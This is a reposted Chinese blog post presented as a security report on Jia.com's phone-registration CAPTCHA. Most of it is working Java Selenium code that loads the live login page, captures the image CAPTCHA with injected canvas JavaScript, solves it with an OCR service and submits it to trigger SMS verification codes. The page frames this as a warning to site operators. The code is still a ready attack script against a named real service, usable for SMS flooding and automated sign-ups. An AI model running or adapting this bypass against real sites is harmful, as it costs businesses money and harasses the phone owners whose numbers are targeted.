0


【齐家网-注册/登录安全分析报告】

前言

由于网站注册入口容易被黑客攻击,存在如下安全问题:

  1. 暴力破解密码,造成用户信息泄露
  2. 短信盗刷的安全问题,影响业务及导致用户投诉
  3. 带来经济损失,尤其是后付费客户,风险巨大,造成亏损无底洞在这里插入图片描述 所以大部分网站及App 都采取图形验证码或滑动验证码等交互解决方案, 但在机器学习能力提高的当下,连百度这样的大厂都遭受攻击导致点名批评, 图形验证及交互验证方式的安全性到底如何? 请看具体分析

一、 齐家网PC 注册入口

简介:齐家网成立于2007年,创始人邓华金,员工超1000人。2018年7月12日,齐家网母公司齐屹科技成功登陆港交所主板(股票代码1739.HK)。
自成立以来,齐家网秉承“用户为先”理念,以提升行业效率和用户极致体验为己任,不断创新发展,深度打造融合线上线下的家装新模式,为家装用户提供更低价格、更高品质和更好服务的装修解决方案, 是用户在互联网寻求家装服务的优选平台。
齐家网业务涵盖家装平台、自营装修业务、齐家特许经营网络、供应链等多个子生态。目前,齐家网已经建立了一个蓬勃发展的生态体系,聚集超过7500家优质装修服务商。

在这里插入图片描述

二丶 安全分析:

采用传统的图形验证码方式,具体为4个数字英文,ocr 识别率在 95% 以上。

测试方法:
采用模拟器+OCR识别

1. 模拟器交互


    private static String INDEX_URL ="https://passport.jia.com/cas/login?service=https://i.jia.com/&app_id=500";

    @Override
    public RetEntity send(WebDriver driver, String areaCode, String phone){
        RetEntity retEntity = new RetEntity();
        try {
            driver.get(INDEX_URL);

            driver.findElement(By.xpath("//a[@class='agree_yes']")).click();

            // 1 输入手机号
            WebElement phoneElemet = ChromeDriverManager.waitElement(driver, By.id("partnerPhone"), 1);
            phoneElemet.sendKeys(phone);

            // 获取验证码
            WebElement sendElement = driver.findElement(By.id("smsSendButton"));
            sendElement.click();

            // 同意并继续
            Thread.sleep(1 * 1000);
            driver.findElement(By.xpath("//a[@class='yes']")).click();

            // 2 获取图形验证码
            Thread.sleep(1 * 1000);
            String imgCode = null, imgUrl;
            byte[] imgByte = null;
            WebElement imgElement = driver.findElement(By.id("captchaImage"));for(int i =0; i <3; i++){
                imgUrl = imgElement.getAttribute("src");
                imgByte =(imgUrl != null) ? GetImage.callJsByUrl(driver, imgUrl): null;
                int len =(imgByte != null) ? imgByte.length :0;
                imgCode =(len >0) ? ddddOcr.getImgCode(imgByte): null;
                boolean rcode =(imgCode != null && imgCode.length()>=4) ? DigitFormat.isRcode(imgCode):false;if(rcode)break;
                imgElement.click();
                Thread.sleep(1 * 1000);}if(imgCode == null || imgCode.length()<4){
                System.out.println("imgCode=" + imgCode);return retEntity;}

            // 3 输入识别出来的图形验证码
            WebElement codeInputElement = driver.findElement(By.id("smsCaptcha"));
            codeInputElement.sendKeys(imgCode);

            // 4 点击下一步
            Thread.sleep(1 * 1000);
            WebElement getCodeElement = ChromeDriverManager.waitElement(driver, By.xpath("//a[@class='submit']"), 20);if(getCodeElement != null){
                getCodeElement.click();
                Thread.sleep(1 * 1000);}

            Thread.sleep(1500);
            String gtInfo = sendElement.getText();
            retEntity.setMsg("[imgCode:" + imgCode + "]->" + gtInfo);if(gtInfo != null && gtInfo.contains("秒后重新发送")){
                retEntity.setRet(0);
                ddddOcr.saveFile("Jia", imgCode, imgByte);return retEntity;}else{
                System.out.println("gtInfo=" + gtInfo);
                ddddOcr.saveFile("Jia/err/", imgCode, imgByte);}return retEntity;} catch (Exception e){
            System.out.println("phone=" + phone + ",e=" + e.toString());for(StackTraceElement ele : e.getStackTrace()){
                System.out.println(ele.toString());}return null;} finally {if(driver != null)
                driver.manage().deleteAllCookies();}}

2. 获取图形验证码


public static byte[] callJsById(WebDriver driver, String id){return callJsById(driver, id, null);}

    public static byte[] callJsById(WebDriver driver, String id, StringBuffer base64){
        String js ="let c = document.createElement('canvas');let ctx = c.getContext('2d');";
        js +="let img = document.getElementById('" + id + "'); /*找到图片*/ ";
        js +="c.height=img.naturalHeight;c.width=img.naturalWidth;";
        js +="ctx.drawImage(img, 0, 0,img.naturalWidth, img.naturalHeight);";
        js +="let base64String = c.toDataURL();return base64String;";
        String src =((JavascriptExecutor) driver).executeScript(js).toString();
        String base64Str = src.substring(src.indexOf(",") + 1);if(base64 != null){
            base64.append(base64Str);}
        byte[] vBytes =(base64Str != null) ? imgStrToByte(base64Str): null;return vBytes;}

3.图形验证码识别(Ddddocr)


public String getImgCode(byte[] bigImage){
        try {if(ddddUrl == null){
                System.out.println("ddddUrl=" + ddddUrl);return null;}

            long time=(new Date()).getTime();
            HttpURLConnection con = null;
            String boundary ="----------" + String.valueOf(time);
            String boundarybytesString ="\r\n--" + boundary + "\r\n";
            OutputStream out = null;

            URL u = new URL(ddddUrl);

            con =(HttpURLConnection) u.openConnection();
            con.setRequestMethod("POST");
            con.setConnectTimeout(10000);
            con.setReadTimeout(10000);
            con.setDoOutput(true);
            con.setDoInput(true);
            con.setUseCaches(true);
            con.setRequestProperty("Content-Type", "multipart/form-data; boundary=" + boundary);

            out = con.getOutputStream();if(bigImage != null && bigImage.length >0){
                out.write(boundarybytesString.getBytes("UTF-8"));
                String paramString ="Content-Disposition: form-data; name=\"image\"; filename=\"" + "bigNxt.gif" + "\"\r\n";
                paramString +="Content-Type: application/octet-stream\r\n\r\n";
                out.write(paramString.getBytes("UTF-8"));
                out.write(bigImage);}

            String tailer ="\r\n--" + boundary + "--\r\n";
            out.write(tailer.getBytes("UTF-8"));

            out.flush();
            out.close();

            StringBuffer buffer = new StringBuffer();
            BufferedReader br = new BufferedReader(new InputStreamReader(con.getInputStream(), "UTF-8"));
            String temp;while((temp = br.readLine())!= null){
                buffer.append(temp);}
            String ret = buffer.toString();if(ret.length()<1){
                System.out.println("ddddUrl=" + ddddUrl + " ret=" + buffer.toString());}return buffer.toString();} catch (Throwable e){
            logger.error("ddddUrl=" + ddddUrl + ",e=" + e.toString());return null;}}
    

    public void saveFile(String factory, String imgCode, byte[] imgByte){
        try {
            String basePath = ConstTable.codePath + factory + "/";
            File ocrFile = new File(basePath + imgCode + ".png");
            FileUtils.writeByteArrayToFile(ocrFile, imgByte);} catch (Exception e){
            logger.error("saveFile() " + e.toString());}}

4. 图形OCR识别结果:

在这里插入图片描述

5. 测试返回结果:

在这里插入图片描述

三 丶测试报告 :

在这里插入图片描述

四丶结语

齐家网成立于2007年,创始人邓华金,员工超1000人。2018年7月12日,齐家网母公司齐屹科技成功登陆港交所主板(股票代码1739.HK)。
自成立以来,齐家网秉承“用户为先”理念,以提升行业效率和用户极致体验为己任,不断创新发展,深度打造融合线上线下的家装新模式,为家装用户提供更低价格、更高品质和更好服务的装修解决方案, 是用户在互联网寻求家装服务的优选平台。
齐家网业务涵盖家装平台、自营装修业务、齐家特许经营网络、供应链等多个子生态。目前,齐家网已经建立了一个蓬勃发展的生态体系,聚集超过7500家优质装修服务商,作为头部的家装无提供商, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。

很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
比如:“ 需求这么赶,当然是先实现功能啊 ”,“ 业务量很小啦,系统就这么点人用,不怕的 ” , “ 我们怎么会被盯上呢,不可能的 ”等等。

有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。

所以大家在安全方面还是要重视。(血淋淋的栗子!)#安全短信#

戳这里→康康你手机号在过多少网站注册过!!!

谷歌图形验证码在AI 面前已经形同虚设,所以谷歌宣布退出验证码服务, 那么当所有的图形验证码都被破解时,大家又该如何做好防御呢?

>>相关阅读
《腾讯防水墙滑动拼图验证码》
《百度旋转图片验证码》
《网易易盾滑动拼图验证码》
《顶象区域面积点选验证码》
《顶象滑动拼图验证码》
《极验滑动拼图验证码》
《使用深度学习来破解 captcha 验证码》
《验证码终结者-基于CNN+BLSTM+CTC的训练部署套件》


本文转载自: https://blog.csdn.net/weixin_44549063/article/details/142357764
版权归原作者 newxtc 所有, 如有侵权,请联系我们删除。

“【齐家网-注册/登录安全分析报告】”的评论:

还没有评论